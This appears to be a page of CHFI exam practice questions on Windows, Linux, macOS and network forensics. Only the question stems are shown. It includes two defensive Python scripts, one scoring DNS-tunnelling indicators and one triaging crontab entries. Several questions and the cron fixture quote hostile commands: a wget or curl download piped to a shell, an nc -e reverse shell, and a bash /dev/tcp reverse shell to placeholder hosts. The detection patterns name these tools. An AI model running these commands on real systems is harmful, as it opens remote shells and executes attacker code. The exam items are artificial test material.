Practice CHFI OS and Network Forensics questions with full explanations on every answer.
1. A security analyst investigates a Windows system and finds an event with ID 4625 in the Security log. What does this event indicate?
2. During a forensic analysis of a compromised Linux server, you notice that the file /var/log/auth.log has been cleared. However, you find that the attacker's commands are still partially recoverable. Which artifact most likely contains the attacker's command history?
3. A forensic analyst recovers a USB device from a suspect's computer. Which Windows registry key should be examined to determine the first time the USB device was connected?
4. An analyst suspects that an attacker used a web shell to execute commands on a Windows web server. Which Windows event ID should the analyst look for to detect service installation that may have been used for persistence?
5. A forensic examiner is analyzing a Mac system and wants to review system logs that record various activities, including application launches and kernel events. Which logging system on macOS should be examined?
6. In Windows forensics, which artifact is used to track recently accessed files and folders via the 'Recent Items' feature?
7. A network analyst is reviewing a packet capture and sees a large number of TCP SYN packets sent to various ports on a single host from multiple source IPs. This pattern is most indicative of which type of attack?
8. During a Linux forensic investigation, you find that the file /etc/cron.d/evil contains the entry: '* * * * * root /bin/bash /root/backdoor.sh'. What persistence mechanism is being used?
9. Which of the following Windows registry keys is commonly used by malware to achieve persistence by executing a program at user logon?
10. In network forensics, which tool is commonly used to analyze and visualize NetFlow data to identify network traffic patterns?
11. A forensic analyst is examining a Windows system and finds that the UserAssist key in the NTUSER.DAT hive contains entries with Rot13-encoded names. What is the primary purpose of the UserAssist key?
12. An attacker has compromised a Linux server and edited the /etc/passwd file to change a user's UID to 0. What is the likely goal of this modification?
13. A forensic analyst is examining a Windows system and wants to identify recently accessed files and programs. Which TWO artifacts should the analyst prioritize? (Select TWO.)
14. A security team is analyzing a compromised Linux server. Indicators suggest the attacker used a web shell. Which THREE of the following are common persistence mechanisms that may be found on the system? (Select THREE.)
15. An investigator is analyzing a Windows system and wants to find evidence of USB device usage. Which TWO registry keys should be examined? (Select TWO.)
16. A security analyst reviews Windows Security Event Logs and finds multiple Event ID 4625 entries from a single source IP address targeting various usernames. Which type of attack is MOST likely occurring?
17. During a forensic investigation of a compromised Linux server, you find the following entry in /var/log/auth.log: 'Mar 10 03:14:15 server sshd[1234]: Accepted publickey for root from 10.0.0.5 port 54321 ssh2: RSA SHA256:AbCdEf123456'. Which artifact should you examine next to determine if unauthorized key-based access occurred?
18. Which Windows artifact is primarily used to determine the execution history of applications, including the path and run count?
19. A forensic analyst discovers an unusual entry in the Windows Registry under 'HKCU\Software\Microsoft\Windows\CurrentVersion\Run'. Which persistence mechanism does this represent?
20. In a macOS forensic investigation, which log system provides a timeline of high-level system events such as application launches and user logins?
21. A network forensic analyst examines a pcap file in Wireshark and sees an HTTP POST request to '/shell.jsp' with a parameter 'cmd' containing 'dir'. The response contains a directory listing. Which intrusion artifact is indicated?
22. During a Linux forensic investigation, you find a suspicious cron job in /etc/cron.d/malware that runs every 5 minutes as root. Which persistence mechanism is being used?
23. Which tool is commonly used for timeline analysis in digital forensics, combining multiple artifacts into a super timeline?
24. An analyst detects a large amount of data being exfiltrated from a network over DNS queries. Which type of network analysis would BEST detect this activity?
25. A Windows system's registry key 'HKLM\SYSTEM\CurrentControlSet\Enum\USBSTOR' contains a subkey with a serial number. What does this artifact indicate?
26. A forensic analyst finds a file with the .plist extension on a Mac system. What type of artifact is this?
27. During a forensic analysis of a compromised Linux system, you notice that the /proc filesystem contains a suspicious entry /proc/12345/exe pointing to /tmp/.hidden/malware. What conclusion can you draw?
28. Which TWO Windows Event IDs are associated with successful logon or explicit credential usage? (Choose TWO.)
29. Which THREE of the following are commonly used for persistence on a Windows system? (Choose THREE.)
30. Which TWO Linux log files are MOST relevant for investigating authentication events and user login activity? (Choose TWO.)
31. During a Windows forensic investigation, an analyst finds a registry key under NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{GUID}\Count. What type of artifact is this, and what information does it typically contain?
32. In Linux forensics, an investigator examines /var/log/auth.log and finds repeated entries of "Failed password for root from 10.0.0.5 port 22 ssh2". Which type of attack is most likely indicated?
33. A security analyst reviews the following Windows Event log entry: Event ID 4648 with logon type 3, subject user 'CONTOSO\admin', target server 'FS01', target user 'CONTOSO\backupadmin'. What does this event indicate?
34. A forensic examiner needs to extract timeline data from a compromised Linux system for analysis with log2timeline/Plaso. Which of the following command sequences should be used?
35. In network forensics, an analyst captures traffic and sees a large number of ICMP echo requests from 10.0.0.1 to 10.0.0.2 with varying payload sizes. What is the most likely scenario?
36. During a Mac OS X forensic investigation, an analyst wants to review user application usage and system events for the last week. Which artifact provides a centralized, binary log of these activities?
37. An incident responder finds a suspicious LNK file in a user's Startup folder on a Windows system. The LNK file's target is "C:\Windows\System32\rundll32.exe" with a command-line argument "javascript:" followed by encoded text. What is the most likely purpose of this shortcut?
38. A forensic examiner is analyzing a compromised Linux server and notices that /etc/cron.daily contains a script named 'sysupdate.sh' that runs a base64-encoded command. Which persistence mechanism is being used?
39. In a Windows forensic investigation, the analyst wants to determine which USB devices were connected to the system, including the device serial number and first/last connection times. Which registry hive and key should be examined?
40. Which Wireshark filter should an analyst use to display only TCP packets that have the SYN flag set and the ACK flag not set?
41. An analyst reviews proxy logs and sees repeated requests to a known malicious domain from multiple internal hosts, each using a different User-Agent string. The requests are all GET requests for /images/icon.png. What technique is most likely being used to evade detection?
42. Which Windows Event ID is generated when a service is installed on a system?
43. Which TWO of the following are valid artifacts for determining program execution on a Windows system? (Select TWO.)
44. Which THREE of the following are common indicators of a web shell on a compromised web server? (Select THREE.)
45. Which TWO of the following tools are primarily used for timeline analysis in digital forensics? (Select TWO.)
46. A forensic analyst examining a Windows machine finds a suspicious service named 'SrvMon' installed. The System event log shows Event ID 7045 at the time of compromise. What does this event indicate?
47. During a Linux forensic investigation, you find that the file /var/log/auth.log has been deleted. Which of the following artefacts would BEST help determine recent SSH login attempts?
48. An analyst reviews Windows Registry for USB device usage history. Which registry hive and key contain the 'USBSTOR' key that logs unique serial numbers of connected USB drives?
49. A network forensics analyst captures traffic and sees a series of TCP SYN packets sent to multiple ports on a target, with no corresponding SYN-ACK replies. What type of activity is MOST likely indicated?
50. In Windows forensics, which artifact is a database of metadata about files and applications accessed by the user, used to populate the 'Recent Items' and 'Quick Access' lists?
51. A forensic examiner finds a suspicious entry in the Linux file /etc/passwd: 'backdoor:x:0:0:root:/root:/bin/bash'. What is the MOST significant security issue with this entry?
52. A security analyst needs to examine network traffic for signs of a data exfiltration attempt. Which tool is specifically designed for deep packet inspection and can reconstruct TCP streams?
53. During a Mac forensic investigation, you examine the unified log for process execution around the time of an incident. Which command-line tool is used to query the macOS unified log?
54. A forensic analyst finds multiple Prefetch files in C:\Windows\Prefetch with recent timestamps. What is the primary value of Prefetch files in an investigation?
55. In network forensics, which type of log is BEST for identifying all outbound connections from internal hosts to external IP addresses on specific ports?
56. A forensic tool outputs a timeline of file system events. The analyst needs to correlate registry modifications with file creation times. Which tool is specifically designed for super timeline creation from multiple sources?
57. An investigator finds a suspicious LNK file on a Windows desktop pointing to an executable in the Temp folder. What is the significance of LNK files in forensic analysis?
58. A forensic analyst is investigating a Windows system for persistence mechanisms. Which TWO registry locations are commonly used by malware to achieve auto-start? (Select TWO.)
59. An analyst is reviewing a Linux system for signs of a rootkit. Which THREE of the following are common indicators of a rootkit infection? (Select THREE.)
60. A network forensic investigator is analyzing traffic from a compromised web server. Which TWO artifacts are MOST likely to indicate the presence of a web shell? (Select TWO.)
61. A security analyst reviews Windows Security event logs and finds Event ID 4625 with Logon Type 10. What does this indicate?
62. Which Windows Registry hive is primarily used to store user-specific application settings and recently accessed files?
63. During a Linux forensic investigation, you find that the /var/log/auth.log file contains log entries showing multiple 'Failed password for root' messages from a single IP address, followed by an 'Accepted password for root' entry. What is the MOST likely conclusion?
64Which tool is commonly used for timeline analysis in digital forensics, allowing examiners to parse and correlate timestamps from various artifacts?
65In Windows forensics, which artifact is used to track recently executed programs on a per-user basis?
66A network forensic analyst captures packets and sees a TCP SYN packet sent to port 80, followed by a SYN-ACK, then an ACK, and then an HTTP GET request. What can be concluded?
67During a forensic examination of a macOS system, you find a file at /private/var/log/system.log and also notice a directory /private/var/db/diagnostics/. What is the significance of these locations?
68Which Windows Event ID is generated when a new service is installed on a system?
69A security analyst is investigating a potential intrusion and finds a webshell on a Linux web server. Which of the following logs would be MOST useful to determine how the webshell was uploaded?
70In Windows registry forensics, which key is examined to identify USB devices that were connected to the system?
71A forensic examiner is analyzing a compromised Linux system and finds a suspicious cron job in /var/spool/cron/crontabs/root that executes a script every hour. The script is located in /tmp/.hidden/update.sh. What is the BEST next step?
72Which network forensic technique involves analyzing the flow of network traffic to identify patterns and anomalies, often using tools like SiLK or nfdump?
73Which TWO of the following artifacts are used for timeline analysis in digital forensics? (Select two.)
74Which THREE of the following are indicators of a web shell on a web server? (Select three.)
75Which TWO of the following are persistence mechanisms commonly found in Windows forensics? (Select two.)
76A security analyst is reviewing Windows Security Event Logs and notices multiple Event ID 4625 entries for a single user account within a short time frame. What does this MOST likely indicate?
77During a forensic investigation of a compromised Linux server, the investigator examines the bash_history file of the root user. She finds the command: wget http://malicious.site/shell.sh && chmod +x shell.sh && ./shell.sh. What is the MOST likely intent of this command sequence?
78A forensic analyst is examining a Windows 10 system for evidence of USB device usage. Which registry hive and key path should she check to find a list of USB devices that have been connected to the system?
79A SOC analyst is analyzing a packet capture from a network where an internal host communicated with a known malicious IP. The analyst uses Wireshark and applies a display filter to isolate all HTTP traffic. Which filter expression should he use?
80In Linux forensics, which file contains information about user account passwords in hashed form?
81A forensic investigator is examining a Mac system and wants to review recently accessed files and applications. Which macOS artifact is MOST useful for this purpose?
82During a network forensic investigation, the analyst examines firewall logs and notices a large number of outbound connections from an internal server to various IP addresses on port 443 at regular intervals. The connections are all initiated by a process called 'svchost.exe' running from a non-standard location (C:\Windows\Temp). What is the MOST likely explanation?
83Which Windows artifact is specifically designed to track the most recently used (MRU) files for specific applications and can be found in the NTUSER.DAT registry hive?
84Which tool is commonly used in timeline analysis for digital forensics to parse various artifacts and create a super timeline?
85A forensic analyst is examining a Windows system for evidence of a program that runs automatically every time the system starts. Which registry key is commonly used to achieve persistence via the 'Run' key?
86An incident responder is analyzing a Linux system and finds a suspicious process running as root. To determine the full command line and environment variables of the process with PID 1234, which file in the /proc filesystem should she examine?
87A forensic analyst is examining browser history from a Chrome installation on a Windows system. Where is the Chrome history database typically stored?
88Which TWO Windows Event IDs are associated with successful and failed logon events? (Select two.)
89Which THREE of the following are common persistence mechanisms found in Linux systems? (Select three.)
90Which TWO of the following are tools commonly used for network forensics analysis? (Select two.)
91A forensic analyst is examining a Windows 10 system and finds suspicious activity. Which registry hive contains user-specific configuration data that can reveal evidence of recent file access through ShellBags, UserAssist, and MRU lists?
92During an incident response on a Linux server, you find the following entry in /var/log/auth.log: "Mar 10 12:34:56 server sshd[1234]: Failed password for root from 10.0.0.5 port 34567 ssh2". Which of the following is the BEST immediate action to prevent further unauthorized access?
93A security analyst is reviewing Windows Event Logs and notices multiple Event ID 4625 entries for a single user account within a short time frame. What does this most likely indicate?
94A forensic analyst is investigating a Windows system for evidence of USB device usage. Which registry key is MOST useful for determining the first time a USB device was connected and its serial number?
95During a forensic investigation of a Linux system, you need to determine which commands a user executed in their shell session. Which file would you examine to find this information?
96Which Windows Event ID is generated when a new service is installed on a system, and is often used by malware to establish persistence?
97A forensic analyst is examining a Mac system for evidence of recent file access. Which artifact provides a timeline of file system events with high precision and is commonly analyzed using tools like mac_apt?
98A network analyst captures traffic and sees an HTTP request containing: GET /wp-content/uploads/evil.php?cmd=id HTTP/1.1. Which of the following is MOST likely occurring?
99A forensic analyst is using Plaso (log2timeline) to create a super timeline from a compromised Windows system. Which of the following is the PRIMARY advantage of using Plaso over manual timeline creation?
100Which tool is specifically designed for timeline analysis in digital forensics and is the command-line version of the log2timeline framework?
101During a forensic examination of a Windows 10 system, you find a file named "chrome_000001.jumplist" in the user's AppData directory. What does the presence of this file indicate?
102A security analyst is reviewing firewall logs and notices repeated connection attempts from an internal IP to an external server on TCP port 4444. The internal host is a web server. What is the MOST likely explanation?
103A forensic analyst is investigating a Windows system for evidence of malware persistence. Which TWO registry locations are commonly used by malware to automatically execute on system startup?
104A security analyst is analyzing network traffic and sees the following: Source IP 10.0.0.1, Destination IP 203.0.113.5, TCP SYN flag set, destination port 445. The analyst suspects a worm propagation attempt. Which TWO additional pieces of evidence would strengthen this conclusion?
105A forensic investigator is examining a Linux system compromised via a web application. Which THREE artifacts should the investigator prioritize to determine the attacker's entry point and post-exploitation activities?
106A security analyst detects a sudden spike in failed logon events with Event ID 4625 on a Windows domain controller. The source IP addresses are random and from various external subnets. Which type of attack is MOST likely occurring?
107During a forensic investigation of a Windows 10 system, an examiner finds the following registry key: NTUSER.DAT\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\Count. The values contain Rot‑13 encoded data. What is the primary purpose of this artifact?
108An analyst is examining a Linux server and issues the command: cat /var/log/auth.log | grep 'Failed password' | awk '{print $1,$2,$3,$9,$11}' | sort | uniq -c. What is the analyst most likely trying to determine?
109Which Windows registry hive should be examined to determine the last time a specific external USB drive was connected to a system?
110A forensic analyst is investigating a macOS system and wants to review a timeline of past application launches and file accesses across multiple days. Which forensic artifact is BEST suited for this purpose?
111A network analyst captures a packet with Wireshark showing a TCP SYN packet from IP 10.0.0.5 to 192.168.1.10 port 443, followed immediately by a SYN‑ACK from 192.168.1.10 to 10.0.0.5, then an RST from 10.0.0.5. What does this sequence MOST likely indicate?
112Which Windows Event ID is generated when a new service is installed on a system?
113During an incident response, an analyst finds the following entry in /etc/crontab: */5 * * * * root /bin/bash -c 'curl -s http://malicious.com/script.sh | bash'. What is the MOST likely purpose of this entry?
114A forensic examiner needs to analyze the contents of a Windows prefetch file (.pf) to determine the last execution time of an application. Which tool would BEST accomplish this task?
115In Linux, which file contains hashed user passwords?
116An analyst reviews NetFlow logs and sees a single internal host communicating with multiple external IPs on port 53 (DNS) over a short period, with each session transferring approximately 1500 bytes. What suspicious activity might this indicate?
117A Windows system has been compromised. The analyst finds a registry run key at HKCU\Software\Microsoft\Windows\CurrentVersion\Run with value name 'UpdateService' pointing to C:\Users\Public\svchost.exe. Why is this particularly suspicious?
118Which TWO Windows artifacts can be used to identify recently accessed files or folders on a system? (Select the two best answers.)
119A forensic examiner is analyzing a Linux system suspected of being used as a C2 server. Which THREE artifacts should the examiner prioritize to find evidence of command execution and persistence? (Select three.)
120Which TWO of the following are common persistence mechanisms used by malware on Windows systems? (Select two.)
121A security analyst reviews Windows Security Event Log and observes Event ID 4625 repeatedly for a single user account from a remote IP address within a short timeframe. What is the MOST likely cause?
122During a forensic investigation of a compromised Linux server, an analyst checks /var/log/auth.log and finds multiple entries like "Failed password for root from 10.0.0.5 port 22 ssh2". Which tool is BEST suited to analyze the timeline of these events?
123A forensic analyst finds a suspicious .plist file in /Library/LaunchDaemons/ on a macOS system. The file contains a key "ProgramArguments" with a path to a script in /tmp. Which persistence mechanism does this indicate?
124A network forensics analyst captures traffic from a suspected data exfiltration. In Wireshark, filtering for DNS queries containing a long subdomain with base64-encoded text suggests which technique?
125Which Windows Registry hive contains user-specific configuration such as MRU lists and UserAssist artifacts?
126A Linux system is suspected of being used as a pivot point. An analyst checks /proc/[pid]/fd/ and sees open file descriptors pointing to sockets. Which command would BEST determine the remote connections associated with these sockets?
127A forensic examiner recovers a Windows 10 system and finds a prefetch file for powershell.exe with a last run time of 3 days ago, but the system's security logs show no interactive logons from that user. What does this discrepancy suggest?
128An analyst identifies an unknown binary running on a Linux server. Which /proc filesystem entry would provide the command-line arguments used to start the process?
129In a macOS forensic investigation, which log system stores high-level events such as application launches and authentication attempts in a binary format, and can be queried using the 'log' command?
130A security team detects exfiltration via HTTP POST requests to a suspicious domain. Which network forensic technique would BEST identify the data being sent in these requests?
131During a forensic examination of a compromised Windows server, you find a registry key under HKLM\SYSTEM\CurrentControlSet\Services that points to a malicious DLL. Which event ID would have been generated when this service was installed?
132A Linux investigator wants to see all commands run by a user from the bash shell. Which file should be examined?
133A forensic analyst is examining a Windows system for evidence of USB device usage. Which TWO registry locations are known to store USB device history?
134A security analyst is investigating a potential webshell on an IIS server. Which THREE artifacts are commonly associated with webshell presence?
135An analyst is reviewing firewall logs and sees repeated outbound connections from an internal host to a known malicious IP on port 443. Which TWO network forensic data sources would BEST help determine if data exfiltration occurred?
136A security analyst reviews Windows Event Logs and sees Event ID 4625 multiple times for a single user account from a remote IP address within a short time frame. What is the MOST likely interpretation?
137During a forensic investigation, you find a file named ntuser.dat.LOG1 in a user's profile directory. What is the primary purpose of this file?
138A Linux system administrator notices unusual outbound connections from a server. Which of the following commands would MOST effectively capture a list of all current network connections along with the associated process IDs?
139A forensic analyst is investigating a Windows 10 system and needs to determine if a USB device was ever connected. Which registry key would provide a comprehensive list of USB devices that have been attached, including the first and last connection times?
140An analyst captures network traffic during an incident and wants to extract files transferred over HTTP. Which Wireshark feature is BEST suited for this task?
141During a forensic examination of a macOS system, an investigator wants to review application execution history. Which artifact contains a chronological record of application launches, including timestamps and process IDs?
142A security team detects a suspicious process that writes to the Windows registry key HKCU\Software\Microsoft\Windows\CurrentVersion\Run. What is the MOST likely purpose of this activity?
143Which Linux log file is the PRIMARY source for authentication-related events such as user logins, sudo usage, and failed authentication attempts?
144A forensic analyst is examining a Windows system and finds a prefetch file named NOTEPAD.EXE-12345678.pf. What information can be gleaned from this artifact? (Select the BEST answer.)
145During a network breach investigation, an analyst examines NetFlow records and sees large data transfers from a server to an external IP address during off-hours. Which type of activity does this MOST likely indicate?
146A forensic analyst needs to create a timeline of file system activity from a disk image. Which tool is specifically designed for this purpose and can parse various artifacts such as registry, prefetch, and log files?
147An incident responder examines a Linux server and finds a suspicious cron job that runs every minute and executes a script located in /tmp. Which persistence technique does this represent?
148Which TWO Windows registry hives are most commonly analyzed during a forensic investigation to determine user activity and system configuration? (Select TWO.)
149Which THREE of the following are common indicators of a web shell presence on a compromised IIS web server? (Select THREE.)
150Which TWO of the following are primary locations for browser history artifacts in a Windows 10 system? (Select TWO.)
151A security analyst reviews Windows Security Event Log and finds multiple Event ID 4625 entries for a single user account within a few seconds. What does this pattern MOST likely indicate?
152During a forensic investigation of a Windows system, an analyst examines the NTUSER.DAT registry hive. Which artifact would MOST likely be found to identify recently accessed documents and folders via the Windows Explorer GUI?
153A Linux system administrator notices that the /var/log/auth.log file shows many 'Failed password for root' entries from a single IP address within a short timeframe. Which tool would BEST help the administrator block further access from that IP?
154During a Mac forensic examination, an investigator needs to find evidence of recently executed applications and accessed files. Which artifact should the investigator prioritize for reconstructing user activity?
155A network analyst captures suspicious traffic and uses Wireshark to examine packets. The analyst notices many TCP SYN packets sent to various ports on a single host with no SYN-ACK replies. What type of activity is MOST likely observed?
156A forensic analyst is performing timeline analysis on a compromised system. Which tool is specifically designed to parse multiple log sources and create a super timeline?
157A Windows system is suspected of having malware that maintains persistence by starting every time a user logs in. Which registry key should be examined FIRST for this persistence mechanism?
158A forensic analyst finds an LNK file on a Windows system pointing to a script located in a temporary folder. The LNK file's timestamps show creation time after the script's known execution time. What does this discrepancy likely indicate?
159A security analyst reviews firewall logs and sees repeated outbound connections from an internal server to an external IP on port 443. The server is not supposed to initiate outbound connections. Which action should the analyst take FIRST?
160In Linux forensics, which file contains user account information including the user ID, group ID, home directory, and default shell?
161An investigator finds a webshell on a compromised web server. Which artifact would be MOST useful to determine what commands were executed through the webshell?
162During a forensic analysis of a Linux system, the investigator finds that the bash_history file is empty for the root user. However, the system has been used actively. What is the MOST likely explanation?
163. Which TWO Windows Event IDs are associated with successful logon events? (Select two.)
164. A forensic analyst is examining a network packet capture for signs of data exfiltration. Which THREE of the following are common indicators of data exfiltration over DNS? (Select three.)
165. In a Mac forensic investigation, which TWO artifacts are valuable for determining the timeline of file access? (Select two.)
166. A security analyst observes multiple Event ID 4625 logon failures for a single user account within a short time frame, followed by an Event ID 4624 logon success. Which attack technique is MOST likely indicated?
167. During a forensic investigation, you find a prefetch file created at 03:15:22 UTC on the system. The corresponding executable's last modified timestamp is 02:30:00 UTC, and the system date/time shows a discrepancy of +5 minutes. What is the MOST accurate interpretation regarding the file execution time?
168. Which Windows registry hive stores user-specific configuration and is loaded when a user logs in, containing artifacts such as recently accessed files and application settings?
169. A Linux system administrator notices unusual outbound connections from a server. Which log file should be examined FIRST to identify authentication attempts related to the compromised account?
170. During a network forensic investigation, an analyst examines a pcap file and finds multiple TCP SYN packets sent to a target IP on port 80, each from a different source IP address. The target answers each SYN with a SYN-ACK and keeps retransmitting SYN-ACKs for earlier packets, but no ACK ever comes back to complete the handshake. What attack is MOST likely occurring?
171. Which tool is specifically designed for timeline analysis of forensic artifacts across multiple systems and can process output from various forensic tools?
172. A forensics examiner finds a suspicious entry in the Windows Registry under HKCU\Software\Microsoft\Windows\CurrentVersion\Run pointing to a PowerShell command. Which persistence mechanism does this represent, and what is the MOST likely impact?
173. In Mac forensics, which artifact stores system-wide and per-user application preferences, often used to determine configured settings and recently accessed files?
174. Which Windows Event ID is generated when a new service is installed on the system?
175. A forensic analyst is examining a compromised Linux server and finds a suspicious binary running as a service. Which file should be checked to determine if the binary is set to start at boot?
176. During a network forensics investigation, an analyst reviews NetFlow data and notices a steady stream of UDP traffic from an internal host to an external IP on port 53. The packet capture shows that external IP answering with unusually large DNS responses. What type of data exfiltration technique is MOST likely being used?
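Questions 164 and 176 both turn on recognising DNS tunnelling from query metadata. The script below is an added example written for this page, not EC-Council or Courseiva code: it profiles queries per (client, parent domain) and flags the indicators those questions point at, namely many unique subdomains, long high-entropy labels, TXT-heavy query types and oversized responses. The resolver rows and the "exfiltrated" payload are constructed; the thresholds and the two-label parent-domain rule are simplifying assumptions (real tooling would use the public suffix list).

```python
"""Profile DNS queries for tunnelling / exfiltration indicators.

Added example for this page, not EC-Council or Courseiva code. Rows, payload
and thresholds are constructed assumptions.
"""
import base64
import math
from collections import Counter, defaultdict


def shannon_entropy(text):
    """Bits per character; encoded payload labels sit well above hostnames like 'www'."""
    n = len(text)
    return -sum(c / n * math.log2(c / n) for c in Counter(text).values()) if n else 0.0


# Constructed payload the 'attacker' moves out in 30-byte chunks, one query label per chunk.
SECRET = bytes(range(256))
CHUNKS = [base64.b32encode(SECRET[i:i + 30]).decode().rstrip("=").lower()
          for i in range(0, len(SECRET), 30)]

# Constructed resolver log rows: (client, qname, qtype, response_bytes).
QUERIES = (
    [("10.0.0.15", f"{h}.example.com", "A", 60) for h in ("www", "mail", "cdn", "updates")]
    + [("10.0.0.15", f"img{i}.static-example.org", "A", 80) for i in range(1, 7)]   # many names, all benign
    + [("10.0.0.42", f"{c}.t.exfil-example.net", "TXT", 900) for c in CHUNKS]        # the tunnel
)


def parent_domain(qname):
    """Assumption: the registrable domain is the last two labels (no public suffix list here)."""
    return ".".join(qname.rstrip(".").split(".")[-2:])


def profile_queries(queries):
    """Aggregate per (client, parent domain) the features a tunnel distorts."""
    groups = defaultdict(list)
    for client, qname, qtype, rbytes in queries:
        groups[(client, parent_domain(qname))].append((qname, qtype, rbytes))
    profiles = {}
    for (client, parent), items in groups.items():
        # left-most label of the subdomain part, where encoded data is carried
        labels = [(q[: -len(parent) - 1] if len(q) > len(parent) else "").split(".")[0]
                  for q, _, _ in items]
        profiles[(client, parent)] = {
            "queries": len(items),
            "unique_subdomains": len({q for q, _, _ in items}),
            "avg_label_len": sum(map(len, labels)) / len(labels),
            "avg_entropy": sum(map(shannon_entropy, labels)) / len(labels),
            "txt_fraction": sum(t == "TXT" for _, t, _ in items) / len(items),
            "avg_response_bytes": sum(r for _, _, r in items) / len(items),
        }
    return profiles


def flag_dns_exfil(profiles, min_unique=5, min_label=30, min_entropy=3.5,
                   min_txt=0.5, min_bytes=512):
    """Flag a group only when it is both high-volume in unique names AND shows a payload indicator."""
    findings = {}
    for key, p in profiles.items():
        if p["unique_subdomains"] < min_unique:
            continue
        reasons = []
        if p["avg_label_len"] >= min_label:
            reasons.append("long labels")
        if p["avg_entropy"] >= min_entropy:
            reasons.append("high-entropy labels")
        if p["txt_fraction"] >= min_txt:
            reasons.append("TXT-heavy")
        if p["avg_response_bytes"] >= min_bytes:
            reasons.append("oversized responses")
        if reasons:
            findings[key] = reasons
    return findings


if __name__ == "__main__":
    for key, reasons in flag_dns_exfil(profile_queries(QUERIES)).items():
        print(key, reasons)
```

The static-example.org group shows why the unique-subdomain count alone is not enough: a CDN produces many distinct names too, but its labels are short, low-entropy A records with small answers, so it is not flagged. Rows in this shape can be produced from a capture with, for example, tshark's `dns.qry.name`, `dns.qry.type` and `frame.len` fields, or from resolver query logs.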
177. A forensics investigator finds a suspicious LNK file on a Windows system that points to a script located on a remote share. What is the PRIMARY forensic significance of this LNK file?
178. Which TWO artifacts are commonly used to identify USB device insertion history on a Windows system? (Select TWO.)
179. Which THREE of the following are indicators of a webshell on a compromised web server? (Select THREE.)
180. Which TWO of the following are typical sources of evidence for network forensics? (Select TWO.)
181. A security analyst reviews the Windows Security Event Log and notices multiple Event ID 4625 entries for a single user account from various IP addresses within a short time frame. What is the MOST likely attack being attempted?
182. During a Linux forensic investigation, you find the following entry in /var/log/auth.log: "Accepted publickey for root from 203.0.113.5 port 54321 ssh2: RSA SHA256:abc...". The user claims they never connect from that IP. Which forensic artifact should you examine next to confirm unauthorized access?
183. A forensic analyst examines a Mac system and runs "log show --predicate 'eventMessage contains "disk"' --last 1h" in Terminal. This command extracts Unified Log entries related to disk activity. Which macOS forensic artifact is the analyst MOST likely querying?
184. In Windows registry forensics, which registry hive contains the SAM database storing local user account hashes?
185. A network forensic analyst captures traffic that includes the following Wireshark filter: "tcp.port == 22 and tcp.flags.syn == 1 and tcp.flags.ack == 0". What type of traffic is this filter selecting?
186. During a Windows forensic analysis, you find a suspicious LNK file in a user's Recent folder. Which of the following is NOT typically retrievable from an LNK file?
187. A forensic tool parses the Windows registry and reveals that a USB device with VID_0781&PID_5583 was last connected on 2023-10-01. Which registry key is the MOST likely source of this information?
188. Which Linux log file is the primary source for authentication-related events, including SSH login attempts and sudo usage?
189. An incident responder finds the following entry in a Linux cron job: "*/5 * * * * root nc -e /bin/sh 10.0.0.5 4444". What is the purpose of this cron job?
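The cron entry in question 189 is a reverse shell scheduled every five minutes. As an added example for this page (not EC-Council or Courseiva code), the script below parses system-crontab-style lines, which carry a user field after the schedule as /etc/cron.d files do, and triages each command against a short list of reverse-shell and persistence patterns. The entries are constructed and the pattern list is an assumed starting point, not a complete signature set.

```python
"""Triage crontab entries for reverse shells and suspicious persistence.

Added example for this page, not EC-Council or Courseiva code. The entries
below are constructed and the pattern list is an assumption.
"""
import re

# Constructed system-crontab / cron.d style lines: schedule, user, command.
CRON_LINES = """\
# m h dom mon dow user command
17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
*/5 * * * * root nc -e /bin/sh 10.0.0.5 4444
* * * * * root /bin/bash /root/backdoor.sh
0 3 * * * backup /usr/local/bin/backup.sh
@reboot www-data curl -s http://203.0.113.9/x.sh | sh
0 * * * * root bash -c 'bash -i >& /dev/tcp/203.0.113.9/4444 0>&1'
"""

# Schedule is either an @keyword or five fields; this parser assumes a user field follows
# (system crontab / cron.d format). Per-user crontabs have no user field.
CRON_RE = re.compile(r"^(?P<sched>@\w+|(?:\S+\s+){4}\S+)\s+(?P<user>\S+)\s+(?P<cmd>.+)$")

# (regex, label) pairs, matched against "<schedule> <command>". Assumed list, extend as needed.
SUSPICIOUS = [
    (r"\bn(c|cat)\b.*\s-e\s", "netcat with -e (reverse shell)"),
    (r"/dev/(tcp|udp)/", "bash /dev/tcp reverse shell"),
    (r"\b(curl|wget)\b.*\|\s*(ba)?sh\b", "download piped to shell"),
    (r"base64\s+(-d|--decode)", "base64-decoded payload"),
    (r"\b(python[23]?|perl)\b.*\bsocket\b", "scripting-language socket"),
    (r"(^|\s)/(tmp|var/tmp|dev/shm)/", "runs from a temp directory"),
    (r"^\*\s+\*\s+\*\s+\*\s+\*\s", "every-minute schedule"),
    (r"^@reboot\b", "runs at every boot"),
]


def parse_cron(text):
    """Return one dict per real entry (comments and blank lines skipped)."""
    entries = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        m = CRON_RE.match(line)
        if m:
            entries.append(m.groupdict())
    return entries


def triage(entries):
    """Keep only entries that match at least one pattern, with the reasons, in file order."""
    hits = []
    for e in entries:
        haystack = f"{e['sched']} {e['cmd']}"
        reasons = [label for pat, label in SUSPICIOUS if re.search(pat, haystack)]
        if reasons:
            hits.append({"user": e["user"], "cmd": e["cmd"], "reasons": reasons})
    return hits


if __name__ == "__main__":
    for h in triage(parse_cron(CRON_LINES)):
        print(f"{h['user']:10} {h['cmd']}\n    -> {', '.join(h['reasons'])}")
```

On a live system the same triage should cover /etc/crontab, /etc/cron.d/*, /var/spool/cron/crontabs/* (user crontabs, which lack the user field) and the /etc/cron.{hourly,daily,weekly,monthly} directories; a script under /root or a temp directory with an every-minute schedule deserves a look even when its command looks harmless.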
190. A forensic examiner uses Plaso (log2timeline) to create a timeline from a disk image. Which of the following artifacts would NOT be included in the timeline by default using the 'all' parser?
191. In a Windows forensic investigation, which registry key is used to examine programs that automatically start at system boot for all users?
192. Which network forensic tool is BEST suited for analyzing NetFlow data to identify top talkers and detect anomalies?
193. A forensic analyst is investigating a Windows system and wants to identify recently executed programs. Which TWO artifacts should the analyst examine?
194. A security analyst detects suspicious outbound traffic to multiple external IPs on port 443. Which THREE network forensic data sources should be examined to identify the infected host and the nature of the communication?
195. During a macOS forensic investigation, which TWO artifacts would be MOST helpful in determining when a file was downloaded from the internet?
196. A security analyst reviewing Windows Security Event Logs sees multiple Event ID 4625 entries for a single user account, followed by a successful Event ID 4624. The account is a domain administrator. What is the MOST likely explanation?
